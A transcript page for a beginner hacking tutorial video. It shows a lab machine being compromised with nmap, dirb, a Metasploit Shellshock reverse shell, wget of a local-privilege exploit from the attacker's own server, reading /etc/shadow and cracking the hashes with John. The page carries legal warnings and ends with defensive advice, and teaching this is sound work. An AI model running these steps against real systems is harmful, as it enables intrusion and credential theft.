Simple Penetration Testing Tutorial for Beginners!

Loi Liang Yang
18 Mar 202215:25

Summary

TLDRThe video script offers a step-by-step tutorial on ethical hacking, focusing on scanning devices for vulnerabilities and exploiting them to gain control of a system. It covers the use of tools like nmap for scanning, dirb for directory listing, and metasploit for exploiting found vulnerabilities. The tutorial also delves into privilege escalation, capturing credentials, and emphasizes the importance of security testing to protect servers from such attacks.

Takeaways

  • πŸš€ The video is an educational tutorial on ethical hacking techniques, emphasizing that hacking is illegal and should not be attempted without permission.
  • πŸ” It covers the process of scanning devices to identify vulnerabilities, including servers and phones, to gain control over the system.
  • πŸ”‘ The tutorial explains the importance of finding a loophole in the system to exploit for gaining unauthorized access.
  • πŸ› οΈ It demonstrates the use of tools like nmap for scanning target devices and identifying open ports and services.
  • 🌐 The script mentions the significance of determining the operating system and version to tailor the attack method effectively.
  • πŸ”Ž The tutorial includes using dirb to discover directories on a server, which can be potential targets for exploitation.
  • πŸ’₯ It introduces Metasploit (msfconsole) for launching targeted attacks against discovered vulnerabilities.
  • πŸ“ˆ Post-exploitation techniques are discussed, such as escalating privileges to gain root access and control over the system.
  • πŸ”’ The video shows how to dump usernames and passwords from a compromised system for further exploitation.
  • πŸ›‘οΈ It highlights the importance of defense mechanisms, like firewalls, to block unauthorized access but also their limitations.
  • πŸ”„ The process of uploading and executing files to escalate privileges is illustrated, including overcoming permission issues.

Q & A

  • What is the main topic of the video script?

    -The main topic is end-to-end article hacking, specifically scanning devices and exploiting vulnerabilities to gain control of computer systems.

  • What tool is recommended for scanning target devices?

    -The tool recommended for scanning target devices is Nmap.

  • Why is it important to scan devices before attempting an exploit?

    -It is important to scan devices to identify vulnerabilities, such as open ports and running services, which can be exploited to gain control of the system.

  • What does 'elevating privileges' mean in the context of hacking?

    -Elevating privileges means gaining higher-level access permissions on a system, typically from a regular user account to root or administrative access.

  • What is the purpose of using the 'dirb' tool in this hacking tutorial?

    -The 'dirb' tool is used to discover directories and files on a web server that might be vulnerable to exploitation.

  • What is the significance of the 'CGI bin' directory in the script?

    -The 'CGI bin' directory is significant because it often contains executable scripts that can be exploited to gain access to the system.

  • How is Metasploit used in the hacking process described in the script?

    -Metasploit is used to find and exploit vulnerabilities in the target system, particularly using the 'shellshock' exploit in this tutorial.

  • What is a 'reverse shell' and why is it useful for hackers?

    -A reverse shell is a method where the target machine connects back to the hacker's machine, bypassing firewall restrictions that block inbound connections, allowing the hacker to control the system remotely.

  • What is the final goal of the hacking process described in the script?

    -The final goal is to gain root access to the target system and extract sensitive information, such as usernames and passwords.

  • Why does the script emphasize the illegality of hacking?

    -The script emphasizes the illegality of hacking to remind viewers that these techniques should not be used for malicious purposes and to warn against attempting these actions without permission.

Outlines

00:00

😲 Introduction to Ethical Hacking Techniques

The script begins with a cautionary introduction to ethical hacking, emphasizing the illegality of hacking unless it's for educational purposes or authorized penetration testing. It outlines a step-by-step approach to scanning devices for vulnerabilities, exploiting them to gain control of a computer system, and elevating privileges post-exploitation. The tutorial uses a hypothetical scenario involving a hacker's computer targeting a system, highlighting tools like nmap for scanning and identifying services, and the importance of identifying operating system versions to tailor attacks effectively.

05:01

πŸ” Scanning and Directory Enumeration in Hacking

This paragraph delves into the process of scanning for services using nmap, with specific flags to identify service versions and operating systems. It then introduces dirb, a tool for directory enumeration to uncover potential entry points on a server. The script describes targeting 'cgi-bin' directories, which are common gateway interfaces for web servers, and using metasploit to find and exploit vulnerabilities. The goal is to gain a reverse shell, which allows the hacker to maintain access despite firewall restrictions, by sending an exploit and payload to the target system.

10:02

πŸ’₯ Gaining Root Access and Privilege Escalation

The script continues with a demonstration of privilege escalation, where the hacker uploads a malicious file to gain root access. It explains the process of using tools like mousepad to edit files, and the challenges faced with permissions when uploading files to a target system. The narrative includes a workaround by hosting the file on the hacker's server and having the target download it. Once executed, the hacker gains root access, allowing them to read sensitive information like usernames and passwords from '/etc/shadow' and '/etc/passwd', and ultimately crack the passwords using 'john', a password cracking tool.

15:03

πŸ›‘οΈ Importance of Server Security and Testing

The final paragraph wraps up the tutorial by stressing the importance of server security. It advises on the necessity of regular testing and scanning to identify and rectify misconfigurations and missing security patches. This proactive approach helps prevent exploits and ensures that production workloads are protected. The script concludes with an invitation to like, share, and subscribe for more ethical hacking tutorials, underlining the educational value of understanding hacking techniques for defensive purposes.

Mindmap

Keywords

πŸ’‘Hacking

Hacking refers to the unauthorized access or manipulation of computer systems or networks. In the context of the video, hacking is portrayed as a method to scan for vulnerabilities and gain unauthorized control over a system. The script emphasizes the illegality of hacking and uses it as a theme to educate viewers on cybersecurity.

πŸ’‘Vulnerability

A vulnerability is a weakness in a system that can be exploited by hackers. The video script discusses finding vulnerabilities within a system to gain control, illustrating the importance of identifying and patching these weaknesses to maintain system security.

πŸ’‘Post-Exploitation

Post-exploitation refers to the actions taken by an attacker after gaining initial access to a system. The script explains that once inside a system, an attacker may attempt to elevate privileges, which is a key part of post-exploitation activities to gain deeper control over the compromised system.

πŸ’‘nmap

nmap is a popular open-source tool used for network discovery and security auditing. In the script, nmap is used to scan target devices for open ports and running services, which is a fundamental step in identifying potential vulnerabilities.

πŸ’‘Services

Services in the context of the video refer to the functionalities provided by a system, such as FTP, SSH, or HTTP servers. The script mentions scanning for services to understand what the target system offers and to find potential attack vectors.

πŸ’‘Ports

Ports are endpoints on a networked system for specific types of communication. The video script discusses targeting ports as part of the scanning process to identify which services are available and potentially vulnerable.

πŸ’‘Exploit

An exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a vulnerability in a system. The script describes using exploits to take control of a system after identifying a vulnerability.

πŸ’‘Metasploit

Metasploit is a penetration testing framework that helps find, exploit, and validate vulnerabilities. The script mentions using Metasploit to search for and utilize exploits against a targeted server.

πŸ’‘Reverse Shell

A reverse shell is a technique used by attackers to connect back to their own system, allowing them to maintain access even if the initial entry point is closed. The video script explains the use of a reverse shell to bypass potential network restrictions.

πŸ’‘Privilege Escalation

Privilege escalation is the act of exploiting a bug, vulnerability, or configuration weakness that allows an attacker to gain higher access rights. In the script, privilege escalation is discussed as a means to gain root access after initially compromising a system.

πŸ’‘Password Cracking

Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a system. The script describes using password cracking tools like 'john' to break hashed passwords and gain further access to a system.

Highlights

Introduction to end-to-end article hacking, emphasizing the illegality of hacking without permission.

Scanning devices to identify vulnerabilities in various systems like servers and phones.

Finding and exploiting vulnerabilities to gain control over a device.

Post-exploitation techniques to elevate privileges and gain complete system control.

Identifying services like FTP, SSH, and HTTP to target weaknesses.

Using nmap for scanning target devices and listing services and their versions.

Determining attack methods based on identified services and their versions.

Launching targeted attacks on services like web servers and FTP.

Using dirb to discover directories that may contain exploitable files.

Targeting CGI scripts as potential entry points for exploitation.

Utilizing Metasploit Framework (msfconsole) to search for and use exploits.

Configuring exploit options such as target URI and HTTP user agent header.

Executing a reverse shell to bypass firewalls and establish a connection.

Dumping usernames and passwords from a compromised system.

Elevating privileges using a malicious file uploaded to the target server.

Compiling and executing a file to gain root access on the compromised system.

Using password cracking tools like John the Ripper to break hashed passwords.

SSHing into the compromised server using cracked credentials.

Emphasizing the importance of regularly testing and scanning servers for vulnerabilities.

Transcripts

play00:00

and yesterday we'll be learning

play00:00

end-to-end article hacking by going

play00:02

after a specific system and we're

play00:04

learning step by step what we can do

play00:06

exactly to scan a device and then after

play00:08

which to be able to gain complete

play00:09

control of the entire computer system

play00:12

and remember kids hacking is illegal if

play00:13

you want to run any of these radical

play00:15

hacking techniques do not try it on mr

play00:17

hackaloy

play00:24

[Music]

play00:33

number one we'll be learning about what

play00:35

we can do in terms of scanning devices

play00:37

all right so when we scan a device we're

play00:39

trying to look out for vulnerabilities

play00:41

and it could be a server it could be a

play00:43

phone it could be any of these devices

play00:45

that you're trying to go after number

play00:47

two what we're trying to do here is to

play00:48

find a vulnerability inside the system

play00:51

that we can take advantage of so once we

play00:53

find a loophole all right we will be

play00:54

able to gain complete control of the

play00:56

device and once we're in the question

play00:58

mark is going to be what else can we do

play01:00

all right so once you're in what is it

play01:02

can we can do in terms of post

play01:04

exploitation all right what can we do to

play01:07

elevate our privileges to be able to

play01:08

gain complete control of the system to

play01:10

even break the password of the computer

play01:12

so as you can see right here on the left

play01:14

side we have the hacker computer all

play01:16

right so this is hacker and what the

play01:18

hacker want to do is then to be able to

play01:20

first scan and then loose down all of

play01:22

those services for example do they have

play01:24

a file transfer protocol server do they

play01:27

have a secure shell being opened up do

play01:29

they have a website running so that we

play01:31

can take advantage of those weaknesses

play01:32

within it and so on and so forth and

play01:34

once we're able to list down all of this

play01:36

we can get the version and then from

play01:38

there we can determine all right what

play01:39

are the different attack methods that we

play01:41

can go after so right here this is the

play01:42

place where we'll be thinking and

play01:43

deciding about what are the different

play01:46

types of attack methods that we can use

play01:47

then after which we can launch a target

play01:50

against say the website okay launch an

play01:51

attack against into the ftp server into

play01:54

secure shell whichever the case is once

play01:56

we have uncovered exploit to use and

play01:58

once we're in right here into the system

play02:00

right what we want to do then is to

play02:02

elevate our privileges so that from a

play02:04

normal user we now have the ability to

play02:07

get root access meaning that we can

play02:08

literally do anything we want with the

play02:11

device remember smash the like button

play02:13

and turn on notifications so that you

play02:14

don't get hacked so right in front of us

play02:15

we're in call linux and the first thing

play02:17

you want to do is go ahead and open up

play02:18

terminal and once you're on terminal

play02:20

what you want to do right here is to

play02:21

have the ability to begin scanning the

play02:24

device or the server or the system

play02:26

however you want to call it so the first

play02:28

thing you want to do is enter nmap so

play02:30

nmap is going to be the tool that we'll

play02:31

use to help us scan the target device so

play02:35

here when you enter nmap you can see all

play02:37

the options are available for us to scan

play02:39

the device to look out for all the

play02:41

services so literally like knocking door

play02:43

on the house trying to scan a house

play02:46

looking out for openings that we can

play02:48

then of course be able to jump into the

play02:50

house and take out for example the cash

play02:53

and the valuables and the jewelries

play02:55

right so this is exactly what we'll be

play02:57

doing as part of launching the attack so

play02:59

the first thing you want to do is to

play03:00

scan the ip address all the hostname all

play03:02

the domain name the goal is that now you

play03:04

have a target in mind so you can enter

play03:06

for example the following which is nmap

play03:08

and what we want to do now is to enter

play03:10

say 1i2

play03:11

168.00114 so this is going to be target

play03:14

device that we're going after so in this

play03:15

case i can enter dash as follow by v so

play03:18

this is for the service version that

play03:20

we're going after dash capital o for the

play03:22

operating system version so we want to

play03:24

know whether it is a linux what version

play03:26

of linux is it if it is a windows

play03:27

computer what version of windows

play03:29

computer is it running on and then after

play03:30

which we want to target the ports so

play03:32

ports are the services that can be made

play03:34

available from the target device so in

play03:36

this case we can target say from port

play03:38

one all the way to six five five three

play03:41

five so once you're done with that hit

play03:43

enter and of course we asked to enter

play03:45

superuser do all right because it

play03:46

requires root privileges so enter on

play03:48

that enter your password hit enter and

play03:50

now we're scanning the device to look up

play03:52

for all these different services that

play03:54

are running on the server and now the

play03:55

scan is completed so right here you can

play03:57

see the following all right we have all

play03:59

this different port numbers all right

play04:01

followed by the protocol so in this case

play04:02

there could be protocols like

play04:04

transmission control protocol and the

play04:06

state is of course open and you can see

play04:08

at the same time what kind of service is

play04:09

it running on is it a file transfer

play04:11

protocol secure shell all right http ipp

play04:15

and all of that all right so all of

play04:16

their services as well as the version on

play04:18

the most right side so this is a really

play04:20

wonderful way to quickly identify all

play04:22

right all of these different services

play04:24

all of the different versions and once

play04:25

you have the version you can then

play04:27

determine what kind of export you want

play04:29

to use to go after all these different

play04:31

type of services so that you can have

play04:34

access into the system and for today's

play04:36

case we will be targeting on apigee and

play04:38

so you can see right here we have http

play04:41

2.4.7 so we'll be targeting the

play04:43

following so as part of targeted device

play04:45

all we got to do is just go ahead and

play04:47

enter the domain name of the ip address

play04:49

here and you can see right here this is

play04:50

the directory listing so you can see all

play04:52

of the directories the files within it

play04:54

so you can always click around to do

play04:56

your enumeration and find out right what

play04:57

is going on so this is a really quick

play04:59

way for you to look out for all these

play05:01

different ways and all these different

play05:02

services that can be helped fd for

play05:04

example in this case the apogee the web

play05:06

server level and what we can do next is

play05:08

jump over to use a tool called dirb so

play05:10

this is a way for us to be able to look

play05:12

out for all the different directories

play05:14

that is held by the server so that we

play05:16

can possibly look out for some of these

play05:18

openings which can give us an access

play05:21

into the server okay so here you can see

play05:23

the following all right all these are

play05:25

different options available and you can

play05:26

just simply enter the following all

play05:27

right so here we go all these examples

play05:29

the irb followed by the protocol of

play05:31

course in this case http and of course

play05:33

you have the url and of course a

play05:34

targeted directory so all you got to do

play05:36

now is enter dirb okay let me go ahead

play05:38

and clear this

play05:40

enter d-i-r-b for my http

play05:44

182.168.0.114. and once you're done with

play05:46

that go ahead and hit enter and you can

play05:48

see right here okay we're scanning and

play05:50

we're looking out for some really

play05:51

interesting thing and as you can see

play05:52

we're done so all we're going to do is

play05:54

scroll all the way back to the top and

play05:55

look up for any interesting results and

play05:58

one of those interesting results that we

play05:59

want to target is the one right here

play06:01

okay so this is cgi bin and this is a

play06:04

place where we're going to target the

play06:06

exploits next up what we really want to

play06:07

do is to figure out what is really in

play06:10

cgi bit so all i got to do is enter dirb

play06:13

followed by slash cgi dash bin slash hit

play06:16

enter on that so we're trying to figure

play06:18

out are there any files within it so you

play06:20

can see right here we have the following

play06:22

all right we have the cgi bin and of

play06:25

course we have the hollow world dot sh

play06:28

so this is the area for us to target and

play06:30

cgi stands for common gateway interface

play06:33

and it is a way for the web server to

play06:35

interact with external content

play06:37

generating programs and so on and so

play06:39

forth so we'll be leveraging on this cgi

play06:41

or for us to be able to gain access into

play06:44

the system so what we can do now is to

play06:45

use a really handy tool called mad

play06:47

splice so you can go ahead and enter

play06:48

sudo msf console hit enter on that and

play06:51

this will start up metasploit and what

play06:52

we are looking out for here in this case

play06:55

is to look for a exploit that we can use

play06:58

as part targeting server so all you got

play06:59

to do is enter search shell shop hit

play07:02

enter on that and here we have several

play07:03

options available for us so we'll be

play07:05

using one of that over here so this is

play07:07

the one that we'll be targeting to use

play07:08

so it is going to be under exploit multi

play07:11

http apigee mod cgi bash environment

play07:15

execute so all we're going to do now is

play07:17

enter use all right followed by one and

play07:19

once you do that you can see the

play07:20

following all right so we have exploit

play07:22

multi http apigee mod cgi bash env exec

play07:26

alright so you can enter show options

play07:28

specify the option as part of targeting

play07:29

the server so all we got to do now is go

play07:32

ahead and take a look at the following

play07:33

all right so we have the header so we'll

play07:34

be using the http user agent header so

play07:37

this is all the values you want to send

play07:38

so here we have the set r host and of

play07:40

course we have the arm path and we have

play07:42

the target uri you have discovered so go

play07:44

ahead and hit enter on that and the

play07:46

reason why we need a reverse shell is

play07:47

because the hacker wants to have taken

play07:49

advantage of a vulnerability and they

play07:52

have sent the exploit as well as the

play07:53

payload what happened is that if they

play07:55

try to open up a service all right so

play07:57

when they open up a service so that they

play07:58

can then finally be able to access over

play08:01

into the system you realize that they'll

play08:03

get blocked the reason why they could

play08:05

get blocked is because there is a

play08:07

firewall right here so the firewall will

play08:09

be inspecting all this different traffic

play08:11

and of course at the same time filter

play08:13

out all these unnecessary ports that

play08:15

could be opened up or all these

play08:17

different services that could be open up

play08:18

as a result of that what the hackers

play08:20

want to do is once they have exploited

play08:21

in the system they want to force a

play08:23

reverse connection outwards the reason

play08:25

is because a lot of all these different

play08:27

firewalls they allow or complete

play08:30

outbound access all right so meaning

play08:32

that they do not restrict a lot of all

play08:34

these different outbound connectivities

play08:36

to the internet once you're ready in

play08:38

three

play08:39

two

play08:40

one hit exploit and you can see right

play08:42

here materpata session two open

play08:46

and we have the following okay

play08:48

that's it we are in it is game over it's

play08:51

as simple as that and once we're in i

play08:53

can enter says info and you can see

play08:55

the ip address the os the architecture

play08:59

and all of the data so quickly now what

play09:01

we want to do is to be able to dump out

play09:03

the username to passwords within the

play09:05

computer system so what i can do now is

play09:07

enter shell and see where we get all

play09:09

right so once we're in here i can enter

play09:10

who am i and you notice that we're on

play09:13

www dash data all right let's see

play09:15

whether we are going to be able to do a

play09:17

to cat etc shadow and this is the place

play09:21

where all this important information

play09:22

usernames and all this data are there so

play09:24

we are not able to do that i can enter

play09:26

pwd so we have preen working directory

play09:29

so we have fairly limited access into

play09:32

the system no worries i will teach you

play09:34

how we can elevate our privileges in the

play09:36

system so here we have pretty good

play09:37

example all right so here we have the

play09:39

following of 2021

play09:41

0903 and we have 37292.c

play09:45

all right so this is the one we'll be

play09:47

using as part of sending and uploading

play09:48

into the server so that we can elevate

play09:51

our privileges okay so all we're going

play09:52

to do now is enter say torch

play09:54

37 292.c okay once you're entered on

play09:57

that you can enter say mousepad 37292.c

play10:01

hit enter on that and all you got to do

play10:03

is just literally just copy and paste

play10:05

whatever you're seeing right here and go

play10:07

ahead and send it over into the file so

play10:10

save it into file and once you're done

play10:11

with that go ahead and close mousepad

play10:14

and what we can do now is jump back over

play10:16

into terminal right and what we can do

play10:18

is go back into interpreter and what we

play10:20

can do next is to upload the file so

play10:22

once we're in interpreter all we're

play10:23

going to do is enter upload all right

play10:24

followed by slash loyalian desktop slash

play10:28

37292.c

play10:30

hit enter on that and see the following

play10:32

operation fail and the reason why you

play10:35

may be getting this is because we do not

play10:37

have right permission so if i go and

play10:39

enter shell so we're in right now so i

play10:41

enter pwd if i try to do say torch

play10:44

abc all right hit enter and that cannot

play10:47

touch abc permission denied so we can

play10:49

exit from here and now what we can do is

play10:52

to think about whether we can upload

play10:54

this file into our own server and then

play10:56

after which

play10:57

from all right target or the session

play11:00

that we currently have download the file

play11:02

and be able to run some

play11:04

other directories so going back into

play11:07

another terminal all you're going to do

play11:08

is enter sudo systemctl all right fold

play11:11

by start

play11:12

apogee2.service hit enter on that

play11:16

enter your password and this would help

play11:18

us start up

play11:19

the apigee server so that we can host

play11:22

our malicious file so what you can do

play11:24

now is go ahead and enter copy

play11:26

37292 into var www.html slash hit enter

play11:30

on that so done we're able to now host

play11:33

this file over and then the target user

play11:36

can now download that file so what i can

play11:38

do now is go ahead and say cd over slash

play11:41

tam all right so this is a directory

play11:43

that's available in pretty much all of

play11:45

the linux servers so that we can write a

play11:48

temporary file in so what i can do now

play11:50

is go ahead do the following enter shell

play11:52

and to wget http 1i2

play11:56

168.0.192 followed by slash all right

play11:59

37292.c hit enter and that

play12:01

oh my are you seeing that we just

play12:03

downloaded the file meaning that we are

play12:05

now able to execute on this by doing the

play12:08

following okay so all we're going to do

play12:10

now is enter gcc37292.c

play12:13

and then we want to output this over to

play12:15

say follow ofs okay so done and next up

play12:18

we can do a chmod plus x to make this

play12:20

executable ofs done enter dot slash ofs

play12:24

hit enter on that

play12:27

guess what all right who am i

play12:30

we got root we're in we have complete

play12:32

control over the entire system so what

play12:35

we want to do now is to be able to break

play12:37

the username and passwords on the linux

play12:39

server yes i know this is pretty crazy

play12:41

stuff so what i can do now is go ahead

play12:43

and enter say cat etc shadow hit enter

play12:46

on that and we have all these different

play12:47

details and you can save them all up

play12:49

into a file alright so in this case we

play12:51

can save all of this into a shadow file

play12:54

on kala linux next up what we want to do

play12:56

is enter cad etc passwd hit enter on

play12:59

that as well and likewise we want to

play13:01

save this all right over into a file on

play13:03

kali linux so that we can do our

play13:05

password breaking so i've already saved

play13:07

up the file and you'll be able to see

play13:09

the following so i can do a cat

play13:11

shadow all right hit enter on that and

play13:13

we can see all right the exact same file

play13:15

right here and we have many interesting

play13:17

uses like anakin skywalker darth vader

play13:20

all these really interesting star wars

play13:21

characters so next up what we can do is

play13:24

likewise we can do a cam passwd all

play13:26

right so here same thing we're seeing

play13:28

all the exact same copy from the linux

play13:30

server over into a collection machine so

play13:32

what we can do next is to go ahead and

play13:34

enter on shadow all right followed by

play13:37

passwd followed by shadow and then what

play13:39

we can do now is i'll put it into

play13:41

unshadowed dot txt all right so go ahead

play13:43

and hit enter on that

play13:45

alright so done okay what we can do next

play13:47

is to use john john is going to be a

play13:49

password cracking software it will use

play13:52

as part of breaking into that file so

play13:54

what we can do now is enter john full by

play13:56

the word list equal all right so in this

play13:58

case we can enter usr

play14:00

share word lists follow my rockq.txt

play14:03

okay and then after which target the

play14:06

unshadow.txt

play14:07

and then three

play14:08

two one hit enter on that

play14:11

you can see the following okay over here

play14:13

it states loaded one password hash okay

play14:16

so all we're gonna do right now is just

play14:18

do the following by entering show so you

play14:21

can enter john

play14:22

show now we can enter unshadowed dot txt

play14:25

hit enter on that we got a following

play14:27

here okay so we got vagrant vagrant so

play14:30

here we got the username as well as the

play14:32

password field just like that remember

play14:34

earlier we had a secure shell service

play14:36

that's available so what we can do now

play14:38

is go ahead and enter ssh vargrand at

play14:40

192 168.0.114

play14:43

and hit enter on that now we can enter

play14:45

the password all right which is vanguard

play14:47

as well what the heck we are in we have

play14:50

a connection over into the linux server

play14:53

using a broken username and password in

play14:56

terms of defense it's really important

play14:58

and critical to always be testing

play15:00

scanning your different servers that you

play15:03

have because they could be hosting a lot

play15:05

of production workloads and you want to

play15:07

ensure that there's no misconfiguration

play15:09

there is no miss security patches so

play15:11

that all this different type of exploits

play15:13

cannot be easily conducted against your

play15:16

servers so once again i hope you learned

play15:18

something valuable in today's tutorial

play15:19

so like share subscribe and turn on

play15:20

notifications so that you can be kept

play15:22

abreast of the latest article hacking

play15:23

tutorials

Browse More Related Video

Dalfox XSS Automation Scanner for Bug Bounty | Security Awareness

Metasploit For Beginners - How To Scan And Pwn A Computer | Learn From A Pro Hacker

How to Use Wifite in Kali Linux: Automated Wireless Penetration Testing Tool

Top 15 Kali Linux Hacking Tools You MUST KNOW!

SickOS 1.2: Vuln Hub OSCP like Box Complete Walkthrough

Red Team: RedTeaming VS PenTesting

Rate This
β˜…
β˜…
β˜…
β˜…
β˜…

5.0 / 5 (0 votes)

Summary
Outlines
Mindmap
Keywords
Highlights
Transcripts
Related Tags
Ethical HackingSystem SecurityVulnerability ScanningExploit TechniquesCybersecurityHacking TutorialNetwork SecurityPenetration TestingSecurity BreachHacker Tools